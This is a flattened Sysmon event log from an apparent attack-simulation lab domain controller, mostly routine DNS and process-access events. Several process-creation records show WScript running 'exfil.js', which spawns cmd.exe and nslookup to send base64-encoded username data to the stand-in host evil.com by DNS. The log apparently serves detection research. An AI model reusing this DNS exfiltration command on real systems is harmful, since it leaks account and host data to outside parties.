354300x8000000000000000197788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.423{00000000-0000-0000-0000-000000000000}5216<unknown process>-udpfalsefalse127.0.0.1-52464-false127.0.0.1-53domain 354300x8000000000000000197787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.423{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52464- 354300x8000000000000000197786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.423{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52463- 354300x8000000000000000197785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.338{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52462- 354300x8000000000000000197784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.337{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52461- 354300x8000000000000000197783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.337{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52460- 354300x8000000000000000197782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.242{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52459- 354300x8000000000000000197781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.242{00000000-0000-0000-0000-000000000000}7452<unknown process>-udptruefalse127.0.0.1-52459-false127.0.0.1-53domain 354300x8000000000000000197780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.175{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52458- 354300x8000000000000000197779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.174{00000000-0000-0000-0000-000000000000}7672<unknown process>-udptruefalse127.0.0.1-52458-false127.0.0.1-53domain 354300x8000000000000000197778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.174{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52457- 354300x8000000000000000197777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.174{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52456- 354300x8000000000000000197776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.174{00000000-0000-0000-0000-000000000000}7672<unknown process>-udptruefalse127.0.0.1-52456-false127.0.0.1-53domain 354300x8000000000000000197775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.069{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52455- 354300x8000000000000000197774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.069{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52454- 354300x8000000000000000197773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.068{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52453- 354300x8000000000000000197772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.994{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52452- 354300x8000000000000000197771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.994{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52451- 354300x8000000000000000197770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.993{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52450- 354300x8000000000000000197769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.904{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52449- 354300x8000000000000000197768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.904{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52448- 354300x8000000000000000197767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.903{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52447- 354300x8000000000000000197766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.903{00000000-0000-0000-0000-000000000000}5044<unknown process>-udptruefalse127.0.0.1-52447-false127.0.0.1-53domain 354300x8000000000000000197765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.807{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52446- 354300x8000000000000000197764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.805{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52445- 354300x8000000000000000197763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.798{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52444- 354300x8000000000000000197762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.798{00000000-0000-0000-0000-000000000000}4052<unknown process>-udptruefalse127.0.0.1-52444-false127.0.0.1-53domain 354300x8000000000000000197761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.703{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52443- 354300x8000000000000000197760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.703{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52442- 354300x8000000000000000197759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.702{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52441- 354300x8000000000000000197758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.702{00000000-0000-0000-0000-000000000000}6196<unknown process>-udptruefalse127.0.0.1-52441-false127.0.0.1-53domain 354300x8000000000000000197757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.537{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52440- 10341000x8000000000000000197756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.333{2E1864BB-17B6-629A-5A3F-000000005F02}77687528C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-5B3F-000000005F02}8064C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.333{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-5B3F-000000005F02}8064C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.319{2E1864BB-17B6-629A-593F-000000005F02}49086108C:\Windows\system32\cmd.exe{2E1864BB-17B6-629A-5B3F-000000005F02}8064C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.319{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.319{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.319{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.319{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.330{2E1864BB-17B6-629A-5B3F-000000005F02}8064C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B6-629A-593F-000000005F02}4908C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltbwgzt.tmp 2>&1 10341000x8000000000000000197748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.286{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-5A3F-000000005F02}7768C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.286{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B6-629A-5A3F-000000005F02}7768C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.286{2E1864BB-17B6-629A-5A3F-000000005F02}77687528C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-593F-000000005F02}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.264{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-5A3F-000000005F02}7768C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.248{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.248{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.248{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.248{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.248{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B6-629A-593F-000000005F02}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.248{2E1864BB-17A1-629A-783D-000000005F02}55527252C:\Windows\System32\WScript.exe{2E1864BB-17B6-629A-593F-000000005F02}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.256{2E1864BB-17B6-629A-593F-000000005F02}4908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltbwgzt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.248{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgcrchj.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:22.185{2E1864BB-17B6-629A-573F-000000005F02}76681104C:\Windows\system32\conhost.exe{2E1864BB-17B6-629A-583F-000000005F02}5696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 